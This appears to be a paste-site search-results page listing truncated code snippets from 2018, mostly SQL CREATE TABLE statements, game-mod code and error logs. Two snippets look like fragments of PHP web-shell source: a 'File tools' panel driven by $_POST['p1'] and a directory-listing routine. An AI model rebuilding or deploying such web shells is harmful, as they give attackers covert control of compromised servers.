42.7K results in 809 ms
7 years ago · Sep 10, 2018, 08:16 AM
structure for table essentialmode.users CREATE TABLE IF NOT EXISTS `users` ( `identifier` varchar(50) COLLATE
7 years ago · Sep 10, 2018, 08:06 AM
SET utf8 ; ----------------------------------------------------- -- Table tblKunde -- ----------------------------------------------------- CREATE TABLE tblKunde ( kid INT NOT NULL AUTO_INCREMENT, name VARCHAR(45),
7 years ago · Sep 10, 2018, 08:02 AM
DECLARE @Role AS VARCHAR(100) IF OBJECT_id('TEMPDB..#LOCATIONS') IS NOT NULL DROP TABLE #LOCATIONS CREATE TABLE #Locations ( Region VARCHAR(10)
7 years ago · Sep 10, 2018, 06:54 AM
structure for table myrpg.c_randomnames CREATE TABLE IF NOT EXISTS `c_randomnames` ( `type` int(11) NOT
7 years ago · Sep 10, 2018, 06:06 AM
completed on 2012-07-12 16:58:48 CREATE DATABASE IF NOT EXISTS `demo_aulas` /*!40100 DEFAULT CHARACTER
7 years ago · Sep 10, 2018, 03:54 AM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
7 years ago · Sep 10, 2018, 01:38 AM
statement changed 0 rows: CREATE TABLE IF NOT EXISTS `accounts` (`lastSeenName` VARCHAR NOT
7 years ago · Sep 10, 2018, 12:52 AM
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if
7 years ago · Sep 09, 2018, 11:52 PM
typeof(value) != "undefined") database.transaction(function(tx) { tx.executeSql("CREATE TABLE IF NOT EXISTS cache(" + "id INTEGER NOT
7 years ago · Sep 09, 2018, 11:38 PM
decl String:query3[256]; Format(query, 256, "CREATE TABLE IF NOT EXISTS playerinfo (steamid VARCHAR(32) NOT
7 years ago · Sep 09, 2018, 09:50 PM
var item in results) { if (done) //this exists to not add too many definitions
7 years ago · Sep 09, 2018, 08:50 PM
get bonus nutrition points if you're /not/ "sick" of them get
7 years ago · Sep 09, 2018, 08:26 PM
TOTAL_TABLES 7 new const szTables[TOTAL_TABLES][] = { "CREATE TABLE IF NOT EXISTS `wc3_player` ( `player_id` int(8) unsigned
7 years ago · Sep 09, 2018, 07:52 PM
user13946` -- -- -------------------------------------------------------- -- -- Структура таблицы `houses` -- CREATE TABLE IF NOT EXISTS `houses` ( `ID` int(11) NOT
7 years ago · Sep 09, 2018, 06:40 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
7 years ago · Sep 09, 2018, 06:10 PM
a mod change Could not instantiate Verb (directOwner=Verse.HediffComp_VerbGiver): System.MissingMethodException: Cannot create an abstract class 'RimWorld.Verb_MeleeAttack'.
7 years ago · Sep 09, 2018, 06:10 PM
new String:Query[255]; //Format(Query, sizeof(Query), "CREATE TABLE IF NOT EXISTS players (steamid TEXT UNIQUE,
7 years ago · Sep 09, 2018, 06:08 PM
PM openmodularturrets.compatability.ModCompatibility checkForMods INFO: Not sure if iron ingot, or electrical
7 years ago · Sep 09, 2018, 06:02 PM
new String:Query[255]; //Format(Query, sizeof(Query), "CREATE TABLE IF NOT EXISTS players (steamid TEXT UNIQUE,
7 years ago · Sep 09, 2018, 06:00 PM
Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '<table width="100%" class="table_home" border="0" cellpadding="3"
Total pages: 2134